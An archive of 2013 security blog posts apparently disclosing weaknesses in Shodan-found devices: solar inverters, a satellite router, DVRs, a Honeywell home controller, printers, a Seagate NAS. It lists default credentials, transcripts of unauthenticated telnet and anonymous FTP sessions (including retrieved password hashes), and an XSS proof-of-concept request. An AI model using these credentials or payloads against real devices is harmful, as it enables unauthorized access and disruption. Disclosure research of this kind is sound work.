Archive for September, 2013

Danfoss Solar Inverters – Multiple Vulnerabilities

September 30, 2013

Danfoss Solar Inverters contain a couple vulnerabilities, found in a saved Shodan search. The notes for the search said “mostly TLX series (6-15 kW / inverter)” and the default credentials are admin / admin, which I verified. After that, there is another problem:

Login screen:

danfoss01

Under Setup -> Communication, the credentials of a mail server are stored in plain text. If the default admin login is not changed then an attacker can gain credentials of another server:

danfoss02

The request is made over HTTP via the GET method, not SSL:

danfoss03

The response is in the clear as seen in a proxy:

danfoss04

Advertisements

Romantis UHP-1000 Satellite Router

September 27, 2013

Via a saved Shodan search the Romantis UHP-1000 Satellite Router does not require a password for telnet access by default! An admin can optionally set a password for basic access and a separate password for the admin access. As you can see, just the basic access gives you a lot of info!

df ~$ telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.
UHP VSAT Terminal Software 2.5.0-31 (13.11.2012)

Router# help
———- Interface control
interface ethernet|serial|demod|modulator disable|enable – IF Control
clear interface ethernet|serial|demod|mod – Reinitialize interface
———- Ethernet interface parameters
ethernet mode ehalf|efull|fhalf|ffull|auto – Speed and duplex selection
arp timeout 30-3600 – ARP table purge interval
———- Demodulator common parameters
demodulator lnb power off|on – LNB power control
demodulator search 0-20000 – Carrier search bandwidth (+/-KHz)
demodulator reference off|on – TDMA RX connector 10 MHz output
———- Demodulator profile parameters
demodulator profile a|b disable|enable – Enable/disable profile
demodulator polarization a|b vertical|horizontal – Polarization
demodulator frequency a|b 950000-2150000 – Central frequency (KHz)
demodulator symbolrate a|b 50-34000 – Symbol rate (KSps)
demodulator mode a|b s1|s2 – DVB-S1 or DVB-S2 mode select
demodulator viterbi a|b 1/2|2/3|3/4|5/6|6/7|7/8|auto – FEC: Viterbi
demodulator spectrum a|b off|on|auto – Spectrum Inversion
———- Demodulator control & diagnostics
demodulator activate a|b – Start carrier profile search
demodulator compensate – Compensate LNB frequency offset
demodulator phase-graph 0-255 – Display phase constellation
demodulator bert qpsk|re|data – Bit error rate meter
demodulator voltage 0-10 – Pointing signal output to USB, dB/V (0-off)
demodulator antenna [0-800] [0-800] – Antenna pointing mode [RF min] [RF max]
demodulator inetvu off|on [0-1] [0-1] – iNetVu mode, GetTX, GetCoords
———- Modulator parameters
modulator mode s1|s2 – Modulator mode
modulator frequency 950000-1750000 – Central frequency (KHz)
modulator symrate 1-33000 – Symbol rate (KSps)
modulator level [0-360] – TX power level (x -0.1 dBm)
modulator tx off|on|pure-carrier|balance – Tx carrier control
modulator inversion off|on – Spectrum inversion
modulator reference off|on – Modulator 10 MHz output
modulator power off|on – Modulator 24V BUC power
modulator tlc range 0-360 0-360 – Max/min allowed auto TX level
modulator tlc mode off|on – Automatic transmit level control
———- DVB-S modulator parameters
modulator fec uncoded|1/2|2/3|3/4|5/6|7/8 – FEC mode
———- DVB-S2 modulator parameters
s2modulator mode ccm|along|ashort – CCM / ACM mode, ACM frame size
s2modulator pilots off|on – Pilots insertion
s2modulator roloff 35|25 – Roloff factor (0.XX)
s2modulator qpsk 13|25|12|35|23|34|45|56|89|910 – QPSK FEC mode
s2modulator 8psk 35|23|34|56|89|910 – 8PSK FEC mode
s2modulator 16apsk 23|34|45|56|89|910 – 16APSK FEC mode
———- IP & SVLAN parameters
ip address IP_ADDR IP_MASK [1-1020] – Add IP address to interface [VLAN]
ip route IP_ADDR IP_MASK IP_ADDR [1-1020] – Add static route [VLAN]
ip map IP_ADDR IP_MASK ml|mm|mh|md 0-1020 [0-500] [1-1020] – Route network to TX SVLAN [TrSh] [VLAN]
ip delete IP_ADDR IP_MASK [1-1020] – Delete IP address, route or map [VLAN]
ip dscp low|med|high STRING – DSCP values priority assignment
ip proxyarp off|on – Answer ARP requests for TX mapped networks
svlan receive serial|demod|tdma 0-1020 [1-1020] – Add RX SVLAN [VLAN]
svlan delete serial|demod|tdma 0-1020 [1-1020] – Delete SVLAN [VLAN]
udp ports 1-65535 1-65535 – UDP ports mapping for RTP compression FROM TO
udp delete 0-65535 – Delete UDP port mapping
ip screening auto|off|on – IP screening control
ip update off|on – Routing table update prevention
———- Multicast parameters
multicast mode off|static|igmp – Multicast routing mode
multicast igmp timeout 1-30 :IGMP mappings lifetime (minutes)
———- TCP acceleration parameters
tcp acceleration off|on – Acceleration state
tcp mtu 400-1460 – Advertized MTU
tcp window 4096-65535 – Advertized TCP window
———- DHCP parameters
dhcp mode off|on – Protocol state
dhcp range IP_ADDR IP_ADDR – IP address range for DHCP
dhcp dns IP_ADDR IP_ADDR – DNS servers list
———- RIP protocol parameters
rip advertise none|static|maps|all – RIP route types to advertise
rip next-hop IP_ADDR – RIP next hop to advertise
———- SNMP protocol parameters
snmp community read|write STRING – Set community strings
snmp access IP_ADDR IP_ADDR – Allow access from
———- L2 bridge parameters
bridge map ml|mm|mh|md 1-1020 [0-500] [1-1020] – Bridge VLAN to TX SVLAN [TrSh] [VLAN]
bridge delete [1-1020] – Delete bridged VLAN [VLAN]
———- Traffic Shaper parameters
shaper stream 0-500 0-64000 [0-64000] [0-500] – TS stream CIR(Kbps) [MAXSPEED(Kbps)] [UpStr]
shaper delete 0-500 – Delete TS stream
shaper total bandwidth 0-128000 – Composite channel bandwidth (Kbps)
shaper slope 1-64 – Shaper algorithm slope factor
———- Time related parameters
time shift -24-24 – Local time zone
time set 0-24 0-60 1-31 1-12 0-99 – Set date/time HH MM DD MM YY
time sntp mode off|client|server|both – SNTP operation mode
time sntp access IP_ADDR [0-1023] – SNTP server access IP VLAN
———- Overall control
admin – Switch to Administrator mode
password user|administrator – Set passwords
idle timeout 10-30000 – Console or Telnet session timeout
prompt STRING – Set system prompt
unit mode scpc|hub|outroute|inroute|remote|hmesh|fhub|frem|span – Terminal mode
unit key 0-15 [0-65535] [0-65535] [0-65535] – Set features key
speed-interval 1-250 – Time for averaging interface traffic
queues 20-800 20-400 20-200 – TX queues length in packets
watchdog reset|interrupt – Watchdog timer overflow action
reboot stop – Stop delayed reboot
reboot auto 0-120 – Reboot if TDMA down [delay/minutes, <5 – disable]
reboot [0-1000] – Reboot device [delay in minutes]
exit – Log out from console
———- TDMA common parameters
tdma network 1-7 – Network number
tdma tx inroute 1-31 – Remote TX inroute channel
tdma rx inroute 1-31 – Hub/Mesh RX inroute channel
———- TDMA hub acquisition parameters
tdma satellite 0-179 0-59 E|W – Satellite position (DEG MIN)
tdma location 0-89 0-59 N|S 0-179 0-59 E|W – Location LAT LON (DEG MIN)
tdma tts source measure|value|location|snmp|gps – Hub TTS source
tdma tts 0-150000 – Manual hub TTS value (us)
tdma command 00000000-00000000 STRING – Command to terminal by SN
$gprmc – Location setting via NMEA-183 GPRMC string
———- TDMA configuration manager connection
tdma server mode off|routing|tdma|all – Server controlled mode
tdma server access IP_ADDR 0-1000 STRING – Server IP address, VLAN, password
———- TDMA remote station parameters
station number 1-252 – Remote station number
station dtts source value|location|snmp|gps – Station DTTS source
station location 0-89 0-59 N|S 0-179 0-59 E|W – Location LAT LON (DEG MIN)
station dtts -64000-64000 – Manual station DTTS value (us)
station transmit correction -30000-30000 – TX freq. correction (KHz)
station receive correction -30000-30000 – RX freq. correction (KHz)
station codec 1-2048 – Realtime codec speed KBps
station threshold 1-255 – Realtime speed threshold KBps
station timeout 1-100 – Realtime timeout (s)
station report auto|scpc|tdma – Which C/N level report to hub
———- TDMA hub/mesh RF parameters
tdma receive 950000-2150000 – Receive central frequency (KHz)
tdma bandwidth x1|x2|x4|x8 – RX acquisition bw. (x +/-6kHz)
tdma transmit 950000-1750000 – Transmit central frequency (KHz)
tdma mesh receive 950000-2150000 – Mesh receive central frequency (KHz)
tdma symbol-rate 50-4000 – Symbol rate (KSps)
tdma fec 2/3|5/6 – FEC rate
tdma spectrum normal|inverted – Receive spectrum inversion
———- TDMA hub protocol parameters
tdma stations number 1-252 – Stations number
tdma frame 16-252 – Frame length in bursts
tdma length 1-10 – Burst length (x192 symbols)
tdma station state on|off 1-252 [1-252] – Turn on or off station [range]
———- TDMA bandwidth allocation parameters
tdma active-rate 1-255 – Active stations request rate
tdma idle-rate 1-255 – Idle stations request rate
tdma down-rate 1-255 – Down stations request rate
tdma timeout 2-60 – Stations idling timeout (frames)
tdma guaranteed 1-252 0-252 – Guaranteed bandwidth for station (STN BW)
———- TDMA transmit level control parameters
tlc hub 20-200 – Desired hub-side receive level (x 0.1dB)
tlc remotes 20-200 – Desired remotes receive level (x 0.1dB)
tlc strategies 0-9 0-9 – Hub TX averageminimum networkown
———- AMIP protocol parameters
amip mode off|on – AMIP control
amip peer IP_ADDR 1-64000 0-1023 – Controller IP address TCP Port and VLAN
amip message STRING – Send AMIP message
———- SCPC TLC mode
tlc mode off|on – Mode control
tlc peer IP_ADDR 0-1020 STRING – Peer IP address, VLAN, password
tlc nominal 20-200 – Desired local receive level (x 0.1dB)
tlc acm off|on – ACM mode control
———- Controlled SCPC mode parameters
cscpc mode off|demod|master|slave – Modulator TX on/off auto-control
cscpc frequency 950000-1700000 – Transmit central frequency (KHz)
cscpc symbol-rate 250-32000 – Symbol rate (KSps)
cscpc standard s1|ccm|along|ashort – Transmission standard S1/S2
cscpc s1 uncoded|1/2|2/3|3/4|5/6|7/8 – FEC mode
cscpc s2 qpsk 12|35|23|34|45|56|89|910 – QPSK FEC mode
cscpc s2 8psk 35|23|34|56|89|910 – 8PSK FEC mode
cscpc qpsk 13|25|12|35|23|34|45|56|89|910 – QPSK FEC mode
cscpc 8psk 35|23|34|56|89|910 – 8PSK FEC mode
cscpc 16apsk 23|34|45|56|89|910 – 16APSK FEC mode
cscpc level 0-360 – TX power level (x -0.1 dBm) 0-default
cscpc activate 00000000-40000000 – Active slave serial number
———- Redundancy backup parameters
backup mode off|on – Backup mode control
backup timeout 5-250 – Mode switching timeout (s)
backup fault timeout 5-250 – Fault timeout (s)
backup local address IP_ADDR – Local address for independent access
backup remote address IP_ADDR – Peer IP address
———- Configuration management
config description STRING – Describe current configuration
config load tftp IP_ADDR 0-1000 STRING – Load config from TFTP [VLAN]
config load default – Load default configuration
config load 0-1 – Load configuration from specified profile
config save tftp IP_ADDR 0-1000 STRING – Save config to TFTP [VLAN]
config save 0-1 – Save current configuration to specified profile
———- Statistics
show interface ethernet|serial|demod|modulator – Interface stats
show errors – Show device errors
show ip [0-1020] – Routing table and forwarding stats [VLAN]
show rtp – RTP header compression stats
show dhcp – DHCP parameters
show snmp – SNMP parameters
show multicast – Multicast stats
show acceleration – TCP acceleration stats
show arp – ARP table
show system – System parameters
show boot – Software boot options
show config – Current configuration
show memory ram|flash|eeprom – Memory state
show shaper – Print Traffic Shaper stats
show tdma – TDMA parameters
show remotes traffic [1-252] – Remotes traffic stats
show remotes [1-252] – Remotes statistics
show cscpc – Display CSCPC parameters
show tlc – SCPC TLC statistics
show backup – Redundancy backup stats
show amip – AMIP stats
clear arp-table – Purge contents of ARP table
clear counters all|ethernet|serial|demod|modulator|ip|tdma – Reset stats
clear log – Purge logs
———- Logging & debug management
show log – Display logs
logging interface|demod|config|system|tdma off|on – Logging events
debug packets|arp|rtp|ping|igmp|dhcp|backup|otg|rip off|on – Debugging
———- Diagnostics
ping IP_ADDR [1-1000000] [40-1500] [1-10000] [0-1020] – IP Number Size Interval(ms) VLAN
traffic-generator off – Disable traffic generator
traffic-generator IP_ADDR 1-50000 36-1500 [0-1020] – IP packets/second packet_length [VLAN]
———- Image management
image load tftp IP_ADDR 0-1000 STRING – Load image by TFTP to RAM [VLAN]
image load xmodem – Load image with X-modem to RAM buffer
image load flash – Copy image from flash to RAM
image write – Write image from RAM to Flash
erase flash – Erase flash bank
———- Boot control
boot main 0-3 0-1 – Main boot profile FLASH_BANK(0-auto) CONF_BANK
boot temp 0-3 0-1 – Temp boot profile FLASH_BANK(0-none) CONF_BANK
boot fallback timeout 1-10000 – Temp image auto fallback period (min)
boot fallback reason uptime|link-up – Auto fallback reason
boot fallback stop – Abandon auto fallback
———- Help
help – Print this help
Router# admin
Administrator password:

Router#
telnet> close
Connection closed.
df ~$

Sinapsi eSolar Default Credentials

September 26, 2013

Ran across another saved search in Shodan this time for Sinapsi eSolar. A web interface to monitor solar power generation, mostly in Italy. Also a good reminder how so many other countries embrace solar power generation while we are so far behind! The default credentials are admin / admin:

You are given an option to access “free” (no login required) for basic info:

esolar0

esolar2-free_access

If you log in as admin (password admin) you get full access including to web cameras that monitor the equipment, if installed:

esolar1

Dedicated Micros EcoSense Digital Video Recorder – Multiple Vulnerabilities

September 25, 2013

The Dedicated Micros EcoSense Digital Video Recorder (DVR) is a “multi-channel recording with simultaneous playback and viewing. The EcoSense can be accessed and controlled from the state-of-the-art, touch sensitive front panel or via a mouse or keyboard, giving the user full access to all the DVR’s features including PTZ control, Alarm and Event Management and Activity Detection.”

I found a manual online but it requires authentication now for some reason and ‘anonymous’ isn’t working. From the manual:

IMPORTANT: By default, no Usernames and Passwords are required to access any of the various menus

By default on the EcoSense the FTP server is enabled and allows anonymous logins. It also gives you quite a bit of access!

df ~/ecosense$ ftp 192.168.3.40
Connected to 192.168.3.40.
220 ADH FTP SERVER READY TYPE HELP FOR HELP
Name (192.168.3.40:df): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is ADH.
ftp> cd ETC
250 Requested file action okay, completed.
ftp> dir
227 Entering Passive Mode (91,84,157,153,5,144)
150 File status okay; about to open data connection.
d——— 1 root root 0 Oct 12 2009 .
———- 1 root root 1182 Sep 29 2009 DAEMONS.INI
———- 1 root root 673 Sep 29 2009 IDBASE.INI
———- 1 root root 421 Sep 29 2009 PATHS.INI
———- 1 root root 4811 Sep 29 2009 SMBCONF.INI
———- 1 root root 74 Sep 29 2009 urlprofiles.example.ini
———- 1 root root 528 Sep 29 2009 USERS.INI
———- 1 root root 1046 Sep 29 2009 WEBUSER.INI
d——— 1 root root 0 Oct 12 2009 TZ
———- 1 root root 16384 Dec 31 1969 USER.DB
226 Closing data connection. Transfer succeeded
ftp> get USER.DB
local: USER.DB remote: USER.DB
227 Entering Passive Mode (192,168,3,40,5,146)
150 File status okay; about to open data connection.
100% |*****************************************************************| 16384 23.98 KB/s 00:00 ETA
226 Closing data connection. Transfer succeeded
16384 bytes received in 00:00 (23.97 KB/s)
ftp> bye
221 Service closing control connection. Bye…
df ~/ecosense$ file USER.DB
USER.DB: ASCII text
df ~/ecosense$ strings USER.DB
Menu Configuration control 3a27621475bd00fec8ca6b74d5ef2763 none 0|0 0|0
Remote Users warehouse 7d9657f56a611dbff1cbf00c8428eadd none 0|ff 0|ff
Remote Users control 4f465a3ba5a652583a2b89635496f64d none 0|ff 0|ff
df ~/ecosense$

According to CrackStation that hash isn’t LM, NTLM, md2, md4, md5, md5(md5), md5-half, sha1, sha1(sha1_bin()), sha224, sha256, sha384, sha512, ripeMD160, whirlpool, or MySQL 4.1+. I don’t know enough about figuring out crypto to proceed. Hopefully someone else can figure it out!

Tuxedo Connected Controller Made by Honeywell – Multiple Vulnerabilities

September 24, 2013

honeywell1

The Tuxedo Connected Controller – Home Security, Automation, Cam (Shodan search) is made by Honeywell (online manual). The first issue is by default no password is set making the web interface available on the internet. The second issue looks like you can enumerate internal hosts by adding a new camera:

honeywell3-internal1

If you get a 404 not found, the host is alive and has a web server. If you get “10060 disconnected” then no host at that IP address. The second issue is that if a camera is configured it can be done with a name or just the IP address giving up internal IPs:

honeywell7-cam_ip_disclosure

The third issue is that without authentication you can control any lights configured:

honeywell8-lights_and_temp

LBP#### Canon Printers – Two Issues

September 23, 2013

Several Canon printers (Shodan search) seem to have a web interface that doesn’t require authentication (94418). Models tested:
LBP3560
LBP5460
LBP5960
LBP5970
LBP6650

canon-print01

From the interface you can see a list of printed documents and usernames. This information may contain a little sensitive data in the printed document name, and the usernames are helpful for other attacks:

canon-infodisc1

You can also upload any file you want to be printed without authentication (End-user Mode). This can be used for pranks or a DoS to keep the device tied up and waste ink:

canon-print02

udpxy Unauthenticated Reboot DoS / Info Disclosure

September 11, 2013

udpxy is a “small-footprint UNIX/Linux daemon to relay multicast UDP traffic to client’s TCP (HTTP) connection.”

Shodan search: http://www.shodanhq.com/search?q=udpxy

http://target/status

This will give some information on the network traffic going to and from the machine. It also lets you restart the server without authenticating. With a simple shell script you can keep rebooting the service.

udpxy

Whoever made the search on Shodan also included this info: http://imgur.com/4vZU7GR

Seagate NAS Default Credentials and XSS

September 10, 2013

BlackArmor NAS 110 and BlackArmor NAS 220 both have default admin credentials:

Log in using the default settings. (The user name and password are case-sensitive.)
user name: admin
password: admin

Most fields seem to sanitize input, but I found one that allows for a POST-based reflected XSS, but the victim has to be authenticated as ‘admin’ (CVE-2013-78008):

POST /admin/system_general.php?lang=en&gi=sy001 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.100
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.100/admin/system_general.php?lang=en&gi=sy001
Cookie: PHPSESSID=4726b9442a30c876867c588f7d98a784; myFavoriteLang=en
Proxy-Connection: Keep-Alive
Content-Length: 280
Content-Type: application/x-www-form-urlencoded

machine_name=Backup&machine_desc=%22%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E&old_webgui_protocol=HTTP&webgui_protocol=HTTP&timezone=Europe%2FAthens&ntpservice=on&ntpserverlist=pool.ntp.org&datetime=Mon%2C+02+Sep+2013+08%3A25%3A09+%2B0300&orderdate=2013-09-02&btn=Submit

Deluge Web UI Default Password

September 9, 2013

It’s fun to see what torrents someone is seeding! Deluge Web UI installs to port 8080, with a default password of ‘deluge’! For easier identification, the server identifies itself as:

Server: TwistedWeb/11.1.0

Shodan and More Defaults

September 8, 2013

Moxa OnCell G3100
OnCell Shodan Search

OnCell Central Web Console
1. Start the web browser.
2. In the Address input box, enter the OnCell Central’s web IP address follow with the 8080 port (ex: 192.168.127.111:8080). Now you are able to see the OnCell Central Manager Welcome page.
3. Enter the default username and password and then click Login.
Username: admin
Password: admin

Read community string (default=public): This is a text password mechanism that is used to weakly
authenticate queries to agents of managed network devices.
Write community string (default=private): This is a text password mechanism that is used to weakly
authenticate changes to agents of managed network devices.


NetVanta Multiple Devices – 3205 AC, 3430, 1335 PoE, also marketed under Total Access 916 (2nd Gen) I think?

If you telnet to the device, the login banner gives up the default password:

df ~$ telnet target
Trying target…
Connected to target.
Escape character is ‘^]’.

****** Important ******

Enable and Telnet passwords are configured to “password”.

Please change them immediately.

The vlan 1 interface is enabled with an address of 10.10.10.1

Telnet access is also enabled.

User Access Verification

Username:

NetVanta 3430 – NV3430G2 Management Interface. The web interface has a default login of ‘admin’ and password of ‘password’.


Ruckus Wireless ZoneDirector

Accessing ZoneDirector’s Command Line Interface
At the Please Login prompt, enter the admin login name (default: admin) and password (default: admin).


LifeSize Control

LifeSize Control automatically uses the default command line interface credentials when attempting to
manage the following devices:

lifesize